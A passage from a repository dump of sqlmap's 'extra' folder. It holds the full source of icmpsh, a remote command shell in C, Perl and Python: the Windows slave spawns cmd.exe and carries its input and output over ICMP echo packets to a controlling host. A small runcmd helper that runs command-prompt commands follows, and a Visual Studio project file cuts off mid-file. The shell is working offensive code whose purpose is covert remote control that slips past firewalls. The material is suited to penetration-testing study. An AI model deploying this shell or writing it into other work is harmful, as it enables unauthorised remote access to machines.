memset(in_buf, 0x00, IN_BUF_SIZE);\r\n        nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);\r\n        if (nbytes > 0) {\r\n            // get ip and icmp header and data part\r\n            ip = (struct iphdr *) in_buf;\r\n            if (nbytes > sizeof(struct iphdr)) {\r\n                nbytes -= sizeof(struct iphdr);\r\n                icmp = (struct icmphdr *) (ip + 1);\r\n                if (nbytes > sizeof(struct icmphdr)) {\r\n                    nbytes -= sizeof(struct icmphdr);\r\n                    data = (char *) (icmp + 1);\r\n                    data[nbytes] = '\\0';\r\n                    printf(\"%s\", data);\r\n                    fflush(stdout);\r\n                }\r\n                \r\n                // reuse headers\r\n                icmp->type = 0;\r\n                addr.sin_family = AF_INET;\r\n                addr.sin_addr.s_addr = ip->saddr;\r\n        \r\n                // read data from stdin\r\n                nbytes = read(0, out_buf, OUT_BUF_SIZE);\r\n                if (nbytes > -1) {\r\n                    memcpy((char *) (icmp + 1), out_buf, nbytes);\r\n                    out_size = nbytes;\r\n                } else {\r\n                    out_size = 0;\r\n                }\r\n\r\n                icmp->checksum = 0x00;\r\n                icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);\r\n\r\n                // send reply\r\n                nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));\r\n                if (nbytes == -1) {\r\n                    perror(\"sendto\");\r\n                    return -1;\r\n                }        \r\n            }\r\n        }\r\n    }\r\n\r\n    return 0;\r\n}\r\n\r\n"
  },
  {
    "path": "sqlmap/extra/icmpsh/icmpsh-m.pl",
    "content": "#!/usr/bin/env perl\n#\n#  icmpsh - simple icmp command shell\n#  Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>\n#  This program is free software: you can redistribute it and/or modify\n#  it under the terms of the GNU General Public License as published by\n#  the Free Software Foundation, either version 3 of the License, or\n#  (at your option) any later version.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program.  If not, see <http://www.gnu.org/licenses/>.\n#\n\n\n\nuse strict;\nuse IO::Socket;\nuse NetPacket::IP;\nuse NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);\nuse Net::RawIP;\nuse Fcntl;\n\nprint \"icmpsh - master\\n\";\n\n# create raw socket\nmy $sock = IO::Socket::INET->new(\n                Proto   => \"ICMP\",\n                Type    => SOCK_RAW,\n                Blocking => 1) or die \"$!\";\n\n# set stdin to non-blocking\nfcntl(STDIN, F_SETFL, O_NONBLOCK) or die \"$!\";\n\nprint \"running...\\n\";\n\nmy $input = '';\nwhile(1) {\n        if ($sock->recv(my $buffer, 4096, 0)) {\n                my $ip = NetPacket::IP->decode($buffer);\n                my $icmp = NetPacket::ICMP->decode($ip->{data});\n                if ($icmp->{type} == ICMP_ECHO) {\n                        # get identifier and sequencenumber\n                        my ($ident,$seq,$data) = unpack(\"SSa*\", $icmp->{data});\n\n                        # write data to stdout and read from stdin\n                        print $data;\n                        $input = <STDIN>;\n\n                        # compile and send response\n                        $icmp->{type} = ICMP_ECHOREPLY;\n                        $icmp->{data} = pack(\"SSa*\", $ident, $seq, $input);\n                        my $raw = $icmp->encode();\n                        my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));\n                        $sock->send($raw, 0, $addr) or die \"$!\\n\";\n                }\n        }\n}\n"
  },
  {
    "path": "sqlmap/extra/icmpsh/icmpsh-s.c",
    "content": "/*\r\n *   icmpsh - simple icmp command shell\r\n *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>\r\n *   This program is free software: you can redistribute it and/or modify\r\n *   it under the terms of the GNU General Public License as published by\r\n *   the Free Software Foundation, either version 3 of the License, or\r\n *   (at your option) any later version.\r\n *\r\n *    This program is distributed in the hope that it will be useful,\r\n *    but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\r\n *    GNU General Public License for more details.\r\n *\r\n *    You should have received a copy of the GNU General Public License\r\n *    along with this program.  If not, see <http://www.gnu.org/licenses/>.\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock2.h>\r\n#include <windows.h>\r\n#include <winsock2.h>\r\n#include <iphlpapi.h>\r\n\r\n#define ICMP_HEADERS_SIZE\t(sizeof(ICMP_ECHO_REPLY) + 8)\r\n\r\n#define STATUS_OK\t\t\t\t\t0\r\n#define STATUS_SINGLE\t\t\t\t1\r\n#define STATUS_PROCESS_NOT_CREATED\t2\r\n\r\n#define TRANSFER_SUCCESS\t\t\t1\r\n#define TRANSFER_FAILURE\t\t\t0\r\n\r\n#define DEFAULT_TIMEOUT\t\t\t    3000\r\n#define DEFAULT_DELAY\t\t\t    200\r\n#define DEFAULT_MAX_BLANKS\t   \t    10\r\n#define DEFAULT_MAX_DATA_SIZE\t    64\r\n\r\nFARPROC icmp_create, icmp_send, to_ip;\r\n\r\nint verbose = 0;\r\n\r\nint spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write)\r\n{\r\n\tSECURITY_ATTRIBUTES sattr;\r\n\tSTARTUPINFOA si;\r\n\tHANDLE in_read, out_write;\r\n\r\n\tmemset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES));\r\n\tmemset(pi, 0x00, sizeof(PROCESS_INFORMATION));\r\n    \r\n\t// create communication pipes  \r\n\tmemset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES));\r\n\tsattr.nLength = sizeof(SECURITY_ATTRIBUTES); \r\n\tsattr.bInheritHandle = TRUE; \r\n\tsattr.lpSecurityDescriptor = NULL; \r\n\r\n\tif (!CreatePipe(out_read, &out_write, &sattr, 0)) {\r\n\t\treturn STATUS_PROCESS_NOT_CREATED;\r\n\t}\r\n\tif (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) {\r\n\t\treturn STATUS_PROCESS_NOT_CREATED;\r\n\t}\r\n\r\n\tif (!CreatePipe(&in_read, in_write, &sattr, 0)) {\r\n\t\treturn STATUS_PROCESS_NOT_CREATED;\r\n\t}\r\n\tif (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) {\r\n\t\treturn STATUS_PROCESS_NOT_CREATED;\r\n\t}\r\n\r\n\t// spawn process\r\n\tmemset(&si, 0x00, sizeof(STARTUPINFO));\r\n\tsi.cb = sizeof(STARTUPINFO); \r\n\tsi.hStdError = out_write;\r\n\tsi.hStdOutput = out_write;\r\n\tsi.hStdInput = in_read;\r\n\tsi.dwFlags |= STARTF_USESTDHANDLES;\r\n\r\n\tif (!CreateProcessA(NULL, \"cmd\", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) {\r\n\t\treturn STATUS_PROCESS_NOT_CREATED;\r\n\t}\r\n\r\n\tCloseHandle(out_write);\r\n\tCloseHandle(in_read);\r\n\r\n\treturn STATUS_OK;\r\n}\r\n\r\nvoid usage(char *path)\r\n{\r\n\tprintf(\"%s [options] -t target\\n\", path);\r\n\tprintf(\"options:\\n\");\r\n\tprintf(\"  -t host            host ip address to send ping requests to\\n\");\r\n\tprintf(\"  -r                 send a single test icmp request and then quit\\n\");\r\n\tprintf(\"  -d milliseconds    delay between requests in milliseconds (default is %u)\\n\", DEFAULT_DELAY);\r\n\tprintf(\"  -o milliseconds    timeout in milliseconds\\n\");\r\n\tprintf(\"  -h                 this screen\\n\");\r\n\tprintf(\"  -b num             maximal number of blanks (unanswered icmp requests)\\n\");\r\n    printf(\"                     before quitting\\n\");\r\n\tprintf(\"  -s bytes           maximal data buffer size in bytes (default is %u bytes)\\n\\n\", DEFAULT_MAX_DATA_SIZE);\r\n\tprintf(\"In order to improve the speed, lower the delay (-d) between requests or\\n\");\r\n    printf(\"increase the size (-s) of the data buffer\\n\");\r\n}\r\n\r\nvoid create_icmp_channel(HANDLE *icmp_chan)\r\n{\r\n\t// create icmp file\r\n\t*icmp_chan = (HANDLE) icmp_create();\r\n}\r\n\r\nint transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout)\r\n{\r\n\tint rs;\r\n\tchar *temp_in_buf;\r\n\tint nbytes;\r\n\r\n\tPICMP_ECHO_REPLY echo_reply;\r\n\r\n\ttemp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE);\r\n\tif (!temp_in_buf) {\r\n\t\treturn TRANSFER_FAILURE;\r\n\t}\r\n\r\n\t// send data to remote host\r\n\trs = icmp_send(\r\n\t\t\ticmp_chan,\r\n\t\t\ttarget,\r\n\t\t\tout_buf,\r\n\t\t\tout_buf_size,\r\n\t\t\tNULL,\r\n\t\t\ttemp_in_buf,\r\n\t\t\tmax_in_data_size + ICMP_HEADERS_SIZE,\r\n\t\t\ttimeout);\r\n\r\n\t\t// check received data\r\n\t\tif (rs > 0) {\r\n\t\t\techo_reply = (PICMP_ECHO_REPLY) temp_in_buf;\r\n\t\t\tif (echo_reply->DataSize > max_in_data_size) {\r\n\t\t\t\tnbytes = max_in_data_size;\r\n\t\t\t} else {\r\n\t\t\t\tnbytes = echo_reply->DataSize;\r\n\t\t\t}\r\n\t\t\tmemcpy(in_buf, echo_reply->Data, nbytes);\r\n\t\t\t*in_buf_size = nbytes;\r\n\r\n\t\t\tfree(temp_in_buf);\r\n\t\t\treturn TRANSFER_SUCCESS;\r\n\t\t}\r\n\r\n\t\tfree(temp_in_buf);\r\n\r\n    return TRANSFER_FAILURE;\r\n}\r\n\r\nint load_deps()\r\n{\r\n\tHMODULE lib;\r\n\t\r\n\tlib = LoadLibraryA(\"ws2_32.dll\");\r\n\tif (lib != NULL) {\r\n        to_ip = GetProcAddress(lib, \"inet_addr\");\r\n        if (!to_ip) {   \r\n            return 0;\r\n        }\r\n    }\r\n\r\n\tlib = LoadLibraryA(\"iphlpapi.dll\");\r\n\tif (lib != NULL) {\r\n\t\ticmp_create = GetProcAddress(lib, \"IcmpCreateFile\");\r\n\t\ticmp_send = GetProcAddress(lib, \"IcmpSendEcho\");\r\n\t\tif (icmp_create && icmp_send) {\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t} \r\n\r\n\tlib = LoadLibraryA(\"ICMP.DLL\");\r\n\tif (lib != NULL) {\r\n\t\ticmp_create = GetProcAddress(lib, \"IcmpCreateFile\");\r\n\t\ticmp_send = GetProcAddress(lib, \"IcmpSendEcho\");\r\n\t\tif (icmp_create && icmp_send) {\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t}\r\n\t\r\n\tprintf(\"failed to load functions (%u)\", GetLastError());\r\n\r\n\treturn 0;\r\n}\r\nint main(int argc, char **argv)\r\n{\r\n\tint opt;\r\n\tchar *target;\r\n\tunsigned int delay, timeout;\r\n\tunsigned int ip_addr;\r\n\tHANDLE pipe_read, pipe_write;\r\n\tHANDLE icmp_chan;\r\n\tunsigned char *in_buf, *out_buf;\r\n\tunsigned int in_buf_size, out_buf_size;\r\n\tDWORD rs;\r\n\tint blanks, max_blanks;\r\n\tPROCESS_INFORMATION pi;\r\n\tint status;\r\n\tunsigned int max_data_size;\r\n\r\n\t// set defaults\r\n\ttarget = 0;\r\n\ttimeout = DEFAULT_TIMEOUT;\r\n\tdelay = DEFAULT_DELAY;\r\n\tmax_blanks = DEFAULT_MAX_BLANKS;\r\n\tmax_data_size = DEFAULT_MAX_DATA_SIZE;\r\n\r\n\tstatus = STATUS_OK;\r\n\tif (!load_deps()) {\r\n\t\tprintf(\"failed to load ICMP library\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\t// parse command line options\r\n\tfor (opt = 1; opt < argc; opt++) {\r\n\t\tif (argv[opt][0] == '-') {\r\n\t\t\tswitch(argv[opt][1]) {\r\n\t\t\t\tcase 'h':\r\n\t\t\t\t    usage(*argv);\r\n\t\t\t\t\treturn 0;\r\n\t\t\t\tcase 't':\r\n\t\t\t\t\tif (opt + 1 < argc) {\r\n\t\t\t\t\t\ttarget = argv[opt + 1];\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'd':\r\n\t\t\t\t\tif (opt + 1 < argc) {\r\n\t\t\t\t\t\tdelay = atol(argv[opt + 1]);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'o':\r\n\t\t\t\t\tif (opt + 1 < argc) {\r\n\t\t\t\t\t\ttimeout = atol(argv[opt + 1]);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'r':\r\n\t\t\t\t\tstatus = STATUS_SINGLE;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 'b':\r\n\t\t\t\t\tif (opt + 1 < argc) {\r\n\t\t\t\t\t\tmax_blanks = atol(argv[opt + 1]);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 's':\r\n\t\t\t\t\tif (opt + 1 < argc) {\r\n\t\t\t\t\t\tmax_data_size = atol(argv[opt + 1]);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tdefault:\r\n\t\t\t\t\tprintf(\"unrecognized option -%c\\n\", argv[1][0]);\r\n\t\t\t\t\tusage(*argv);\r\n\t\t\t\t\treturn -1;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tif (!target) {\r\n\t\tprintf(\"you need to specify a host with -t. Try -h for more options\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tip_addr = to_ip(target);\r\n\r\n\t// don't spawn a shell if we're only sending a single test request\r\n\tif (status != STATUS_SINGLE) {\r\n\t\tstatus = spawn_shell(&pi, &pipe_read, &pipe_write);\r\n\t}\r\n\r\n\t// create icmp channel\r\n\tcreate_icmp_channel(&icmp_chan);\r\n\tif (icmp_chan == INVALID_HANDLE_VALUE) {\r\n\t    printf(\"unable to create ICMP file: %u\\n\", GetLastError());\r\n\t    return -1;\r\n\t}\r\n\r\n\t// allocate transfer buffers\r\n\tin_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);\r\n\tout_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE);\r\n\tif (!in_buf || !out_buf) {\r\n\t\tprintf(\"failed to allocate memory for transfer buffers\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tmemset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);\r\n\tmemset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE);\r\n\r\n\t// sending/receiving loop\r\n\tblanks = 0;\r\n\tdo {\r\n\r\n\t\tswitch(status) {\r\n\t\t\tcase STATUS_SINGLE:\r\n\t\t\t\t// reply with a static string\r\n\t\t\t\tout_buf_size = sprintf(out_buf, \"Test1234\\n\");\r\n\t\t\t\tbreak;\r\n\t\t\tcase STATUS_PROCESS_NOT_CREATED:\r\n\t\t\t\t// reply with error message\r\n\t\t\t\tout_buf_size = sprintf(out_buf, \"Process was not created\\n\");\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\t// read data from process via pipe\r\n\t\t\t\tout_buf_size = 0;\r\n\t\t\t\tif (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) {\r\n\t\t\t\t\tif (out_buf_size > 0) {\r\n\t\t\t\t\t\tout_buf_size = 0;\r\n\t\t\t\t\t\trs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL);\r\n\t\t\t\t\t\tif (!rs && GetLastError() != ERROR_IO_PENDING) {\r\n\t\t\t\t\t\t\tout_buf_size = sprintf(out_buf, \"Error: ReadFile failed with %i\\n\", GetLastError());\r\n\t\t\t\t\t\t} \r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tout_buf_size = sprintf(out_buf, \"Error: PeekNamedPipe failed with %i\\n\", GetLastError());\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t// send request/receive response\r\n\t\tif (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size,  max_data_size, timeout) == TRANSFER_SUCCESS) {\r\n\t\t\tif (status == STATUS_OK) {\r\n\t\t\t\t// write data from response back into pipe\r\n\t\t\t\tWriteFile(pipe_write, in_buf, in_buf_size, &rs, 0);\r\n\t\t\t}\r\n\t\t\tblanks = 0;\r\n\t\t} else {\r\n\t\t\t// no reply received or error occured\r\n\t\t\tblanks++;\r\n\t\t}\r\n\r\n\t\t// wait between requests\r\n\t\tSleep(delay);\r\n\r\n\t} while (status == STATUS_OK && blanks < max_blanks);\r\n\r\n\tif (status == STATUS_OK) {\r\n\t\tTerminateProcess(pi.hProcess, 0);\r\n\t}\r\n\r\n    return 0;\r\n}\r\n\r\n"
  },
  {
    "path": "sqlmap/extra/icmpsh/icmpsh_m.py",
    "content": "#!/usr/bin/env python\n#\n#  icmpsh - simple icmp command shell (port of icmpsh-m.pl written in\n#  Perl by Nico Leidecker <nico@leidecker.info>)\n#\n#  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>\n#\n#\n#  This program is free software: you can redistribute it and/or modify\n#  it under the terms of the GNU General Public License as published by\n#  the Free Software Foundation, either version 3 of the License, or\n#  (at your option) any later version.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nimport os\nimport select\nimport socket\nimport sys\n\ndef setNonBlocking(fd):\n    \"\"\"\n    Make a file descriptor non-blocking\n    \"\"\"\n\n    import fcntl\n\n    flags = fcntl.fcntl(fd, fcntl.F_GETFL)\n    flags = flags | os.O_NONBLOCK\n    fcntl.fcntl(fd, fcntl.F_SETFL, flags)\n\ndef main(src, dst):\n    if sys.platform == \"nt\":\n        sys.stderr.write('icmpsh master can only run on Posix systems\\n')\n        sys.exit(255)\n\n    try:\n        from impacket import ImpactDecoder\n        from impacket import ImpactPacket\n    except ImportError:\n        sys.stderr.write('You need to install Python Impacket library first\\n')\n        sys.exit(255)\n\n    # Make standard input a non-blocking file\n    stdin_fd = sys.stdin.fileno()\n    setNonBlocking(stdin_fd)\n\n    # Open one socket for ICMP protocol\n    # A special option is set on the socket so that IP headers are included\n    # with the returned data\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n    except socket.error:\n        sys.stderr.write('You need to run icmpsh master with administrator privileges\\n')\n        sys.exit(1)\n\n    sock.setblocking(0)\n    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n\n    # Create a new IP packet and set its source and destination addresses\n    ip = ImpactPacket.IP()\n    ip.set_ip_src(src)\n    ip.set_ip_dst(dst)\n\n    # Create a new ICMP packet of type ECHO REPLY\n    icmp = ImpactPacket.ICMP()\n    icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)\n\n    # Instantiate an IP packets decoder\n    decoder = ImpactDecoder.IPDecoder()\n\n    while True:\n        try:\n            cmd = ''\n\n            # Wait for incoming replies\n            if sock in select.select([sock], [], [])[0]:\n                buff = sock.recv(4096)\n\n                if 0 == len(buff):\n                    # Socket remotely closed\n                    sock.close()\n                    sys.exit(0)\n\n                # Packet received; decode and display it\n                ippacket = decoder.decode(buff)\n                icmppacket = ippacket.child()\n\n                # If the packet matches, report it to the user\n                if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():\n                    # Get identifier and sequence number\n                    ident = icmppacket.get_icmp_id()\n                    seq_id = icmppacket.get_icmp_seq()\n                    data = icmppacket.get_data_as_string()\n\n                    if len(data) > 0:\n                        sys.stdout.write(data)\n\n                    # Parse command from standard input\n                    try:\n                        cmd = sys.stdin.readline()\n                    except:\n                        pass\n\n                    if cmd == 'exit\\n':\n                        return\n\n                    # Set sequence number and identifier\n                    icmp.set_icmp_id(ident)\n                    icmp.set_icmp_seq(seq_id)\n\n                    # Include the command as data inside the ICMP packet\n                    icmp.contains(ImpactPacket.Data(cmd))\n\n                    # Calculate its checksum\n                    icmp.set_icmp_cksum(0)\n                    icmp.auto_checksum = 1\n\n                    # Have the IP packet contain the ICMP packet (along with its payload)\n                    ip.contains(icmp)\n\n                    try:\n                        # Send it to the target host\n                        sock.sendto(ip.get_packet(), (dst, 0))\n                    except socket.error as ex:\n                        sys.stderr.write(\"'%s'\\n\" % ex)\n                        sys.stderr.flush()\n        except:\n            break\n\nif __name__ == '__main__':\n    if len(sys.argv) < 3:\n        msg = 'missing mandatory options. Execute as root:\\n'\n        msg += './icmpsh-m.py <source IP address> <destination IP address>\\n'\n        sys.stderr.write(msg)\n        sys.exit(1)\n\n    main(sys.argv[1], sys.argv[2])\n"
  },
  {
    "path": "sqlmap/extra/runcmd/README.txt",
    "content": "runcmd.exe is an auxiliary program that can be used for running command prompt\ncommands skipping standard \"cmd /c\" way. It is licensed under the terms of the\nGNU Lesser General Public License.\n"
  },
  {
    "path": "sqlmap/extra/runcmd/src/README.txt",
    "content": "Compile only the Release version because the Runtime library option\n(Project Properties -> Configuration Properties -> C/C++ -> Code\nGeneration) is set to \"Multi-threaded (/MT)\", which statically links\neverything into executable and doesn't compile Debug version at all.\n"
  },
  {
    "path": "sqlmap/extra/runcmd/src/runcmd/runcmd.cpp",
    "content": "/* \r\n\truncmd - a program for running command prompt commands\r\n\tCopyright (C) 2010 Miroslav Stampar\r\n\temail: miroslav.stampar@gmail.com\r\n\t\r\n\tThis library is free software; you can redistribute it and/or\r\n\tmodify it under the terms of the GNU Lesser General Public\r\n\tLicense as published by the Free Software Foundation; either\r\n\tversion 2.1 of the License, or (at your option) any later version.\r\n\t\r\n\tThis library is distributed in the hope that it will be useful,\r\n\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\n\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\r\n\tLesser General Public License for more details.\r\n\t\r\n\tYou should have received a copy of the GNU Lesser General Public\r\n\tLicense along with this library; if not, write to the Free Software\r\n\tFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <windows.h>\r\n#include <use_ansi.h>\r\n#include \"stdafx.h\"\r\n#include <string>\r\n\r\nusing namespace std;\r\nint main(int argc, char* argv[])\r\n{\r\n  FILE *fp;\r\n  string cmd;\r\n\r\n  for( int count = 1; count < argc; count++ )\r\n\tcmd += \" \" + string(argv[count]);\r\n\r\n  fp = _popen(cmd.c_str(), \"r\");\r\n\r\n  if (fp != NULL) {\r\n    char buffer[BUFSIZ];\r\n\r\n    while (fgets(buffer, sizeof buffer, fp) != NULL)\r\n      fputs(buffer, stdout);\r\n  }\r\n\r\n  return 0;\r\n}\r\n"
  },
  {
    "path": "sqlmap/extra/runcmd/src/runcmd/runcmd.vcproj",
    "content": "<?xml version=\"1.0\" encoding=\"windows-1250\"?>\r\n<VisualStudioProject\r\n\tProjectType=\"Visual C++\"\r\n\tVersion=\"8,00\"\r\n\tName=\"runcmd\"\r\n\tProjectGUID=\"{1C6185A9-871A-4F6E-9B2D-BE4399479784}\"\r\n\tRootNamespace=\"runcmd\"\r\n\tKeyword=\"Win32Proj\"\r\n\t>\r\n\t<Platforms>\r\n\t\t<Platform\r\n\t\t\tName=\"Win32\"\r\n\t\t/>\r\n\t</Platforms>\r\n\t<ToolFiles>\r\n\t</ToolFiles>\r\n\t<Configurations>\r\n\t\t<Configuration\r\n\t\t\tName=\"Debug|Win32\"\r\n\t\t\tOutputDirectory=\"$(SolutionDir)$(ConfigurationName)\"\r\n\t\t\tIntermediateDirectory=\"$(ConfigurationName)\"\r\n\t\t\tConfigurationType=\"1\"\r\n\t\t\tCharacterSet=\"1\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServiceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tOptimization=\"0\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;_DEBUG;_CONSOLE\"\r\n\t\t\t\tMinimalRebuild=\"true\"\r\n\t\t\t\tBasicRuntimeChecks=\"3\"\r\n\t\t\t\tRuntimeLibrary=\"0\"\r\n\t\t\t\tUsePrecompiledHeader=\"2\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDetect64BitPortabilityProblems=\"true\"\r\n\t\t\t\tDebugInformationFormat=\"4\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tLinkIncremental=\"2\"\r\n\t\t\t\tGenerateDebugInformation=\"true\"\r\n\t\t\t\tSubSystem=\"1\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebDeploymentTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t/>\r\n\t\t</Configuration>\r\n\t\t<Configuration\r\n\t\t\tName=\"Release|Win32\"\r\n\t\t\tOutputDirectory=\"$(SolutionDir)$(ConfigurationName)\"\r\n\t\t\tIntermediateDirectory=\"$(ConfigurationName)\"\r\n\t\t\tConfigurationType=\"1\"\r\n\t\t\tCharacterSet=\"1\"\r\n\t\t\tWholeProgramOptimization=\"1\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServiceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;NDEBUG;_CONSOLE\"\r\n\t\t\t\tRuntimeLibrary=\"0\"\r\n\t\t\t\tUsePrecompiledHeader=\"2\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDetect64BitPortabilityProblems=\"true\"\r\n\t\t\t\tDebugInformationFormat=\"3\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tLinkIncremental=\"1\"\r\n\t\t\t\tGenerateDebugInformation=\"true\"\r\n\t\t\t\tSubSystem=\"1\"\r\n\t\t\t\tOptimizeReferences=\"2\"\r\n\t\t\t\tEnableCOMDATFolding=\"2\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t